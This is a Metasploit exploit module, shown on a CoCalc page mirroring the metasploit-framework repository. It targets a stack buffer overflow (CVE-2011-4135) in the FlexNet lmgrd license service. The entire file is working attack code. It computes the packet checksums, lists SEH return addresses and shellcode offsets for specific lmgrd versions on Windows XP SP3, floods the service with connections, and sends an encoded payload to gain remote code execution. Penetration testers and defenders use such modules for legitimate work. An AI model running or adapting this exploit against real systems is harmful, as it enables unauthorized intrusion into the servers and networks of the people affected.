Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/license/flexnet_lmgrd_bof.rb
25180 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'FlexNet License Server Manager lmgrd Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a vulnerability in the FlexNet

19
          License Server Manager.

20


21
          The vulnerability is due to the insecure usage of memcpy

22
          in the lmgrd service when handling network packets, which

23
          results in a stack buffer overflow.

24


25
          In order to improve reliability, this module will make lots of

26
          connections to lmgrd during each attempt to maximize its success.

27
        },

28
        'Author' => [

29
          'Luigi Auriemma', # Vulnerability Discovery and PoC

30
          'Alexander Gavrun', # Vulnerability Discovery

31
          'juan vazquez', # Metasploit module

32
          'sinn3r' # Metasploit module

33
        ],

34
        'License' => MSF_LICENSE,

35
        'References' => [

36
          [ 'CVE', '2011-4135' ],

37
          [ 'OSVDB', '81899' ],

38
          [ 'BID', '52718' ],

39
          [ 'ZDI', '12-052' ],

40
          [ 'URL', 'http://aluigi.altervista.org/adv/lmgrd_1-adv.txt' ],

41
          [ 'URL', 'http://www.flexerasoftware.com/pl/13057.htm' ] # Vendor advisory

42
        ],

43
        'Privileged' => true,

44
        'DefaultOptions' => {

45
          'EXITFUNC' => 'process'

46
        },

47
        'Payload' => {

48
          'Space' => 4000

49
        },

50
        'Platform' => 'win',

51
        'Targets' => [

52
          [ 'Debug', {} ],

53
          [

54
            'Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3',

55
            {

56
              'Offset' => 10476,

57
              'ShellcodeOffset' => 5484,

58
              'Ret' => 0x0047d01f # ppr from lmgrd.exe

59
            }

60
          ],

61
          [

62
            'Alias License Tools 10.8.0.7 / lmgrd 10.8.0.7 / Windows XP SP3',

63
            {

64
              'Offset' => 7324,

65
              'ShellcodeOffset' => 2332,

66
              'Ret' => 0x004eda91 # ppr from lmgrd.exe

67
            }

68
          ],

69
          [

70
            'Alias License Tools 10.8 / lmgrd 10.8.0.2 / Windows XP SP3',

71
            {

72
              'Offset' => 7320,

73
              'ShellcodeOffset' => 2328,

74
              'Ret' => 0x004eb2e1 # ppr from lmgrd.exe

75
            }

76
          ],

77
        ],

78
        'DefaultTarget' => 1,

79
        'DisclosureDate' => '2012-03-23',

80
        'Notes' => {

81
          'Reliability' => UNKNOWN_RELIABILITY,

82
          'Stability' => UNKNOWN_STABILITY,

83
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

84
        }

85
      )

86
    )

87


88
    register_options(

89
      [

90
        Opt::RPORT(27000),

91
        OptInt.new('Attempts', [ true, 'Number of attempts for the exploit phase', 20 ]),

92
        OptInt.new('Wait', [ true, 'Delay between brute force attempts', 2 ]),

93
        OptInt.new('Jam', [ true, 'Number of requests to jam the server', 100 ])

94
      ]

95
    )

96
  end

97


98
  def header_checksum(packet)

99
    packet_bytes = packet.unpack("C*")

100
    checksum = packet_bytes[0]

101
    i = 2

102
    while i < 0x14

103
      checksum = checksum + packet_bytes[i]

104
      i = i + 1

105
    end

106
    return (checksum & 0x0FF)

107
  end

108


109
  def data_checksum(packet_data)

110
    word_table = ""

111
    i = 0

112
    while i < 256

113
      v4 = 0

114
      v3 = i

115
      j = 8

116


117
      while j > 0

118
        if ((v4 ^ v3) & 1) == 1

119
          v4 = ((v4 >> 1) ^ 0x3A5D) & 0x0FFFF

120
        else

121
          v4 = (v4 >> 1) & 0x0FFFF

122
        end

123
        v3 >>= 1

124
        j = j - 1

125
      end

126


127
      word_table << [v4].pack("S")

128
      i = i + 1

129
    end

130
    k = 0

131
    checksum = 0

132
    data_bytes = packet_data.unpack("C*")

133
    word_table_words = word_table.unpack("S*")

134
    while k < packet_data.length

135
      position = data_bytes[k] ^ (checksum & 0x0FF)

136
      checksum = (word_table_words[position] ^ (checksum >> 8)) & 0x0FFFF

137
      k = k + 1

138
    end

139
    return checksum

140
  end

141


142
  def create_packet(data)

143
    pkt = "\x2f"

144
    pkt << "\x00" # header checksum

145
    pkt << "\x00\x00" # data checksum

146
    pkt << "\x00\x00" # pkt length

147
    pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

148
    pkt << data

149


150
    pkt[4, 2] = [pkt.length].pack("n")

151


152
    data_sum = data_checksum(pkt[4, pkt.length - 4])

153
    pkt[2, 2] = [data_sum].pack("n")

154


155
    hdr_sum = header_checksum(pkt[0, 20])

156
    pkt[1] = [hdr_sum].pack("C")

157


158
    return pkt

159
  end

160


161
  def jam

162
    pkt = create_packet("")

163


164
    datastore['Jam'].times do

165
      connect

166
      sock.put(pkt)

167
      disconnect

168
    end

169
  end

170


171
  def exploit

172
    i = 1

173
    while i <= datastore['Attempts'] and not session_created?

174
      print_status("Attempt #{i}/#{datastore['Attempts']} to exploit...")

175
      do_exploit

176
      sleep(datastore['Wait'])

177
      i = i + 1

178
    end

179


180
    if not session_created?

181
      print_error("Exploit didn't work after #{i} attempts")

182
    end

183
  end

184


185
  def do_exploit

186
    t = framework.threads.spawn("jam", false) { jam }

187
    my_payload = payload.encoded

188


189
    header_length = 20 # See create_packet() to understand this number

190
    pkt_data = ""

191
    if target.name =~ /Debug/

192
      pkt_data << "a" * (65535 - header_length)

193
    else

194


195
      pkt_data << rand_text(target['ShellcodeOffset'])

196
      pkt_data << my_payload

197
      pkt_data << rand_text(target['Offset'] - target['ShellcodeOffset'] - my_payload.length)

198
      pkt_data << generate_seh_record(target.ret)

199
      pkt_data << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5000").encode_string

200
      pkt_data << rand_text(65535 - pkt_data.length - header_length)

201
    end

202


203
    pkt = create_packet(pkt_data)

204


205
    connect

206
    sock.put(pkt)

207
    handler

208
    disconnect

209
  end

210
end

211


212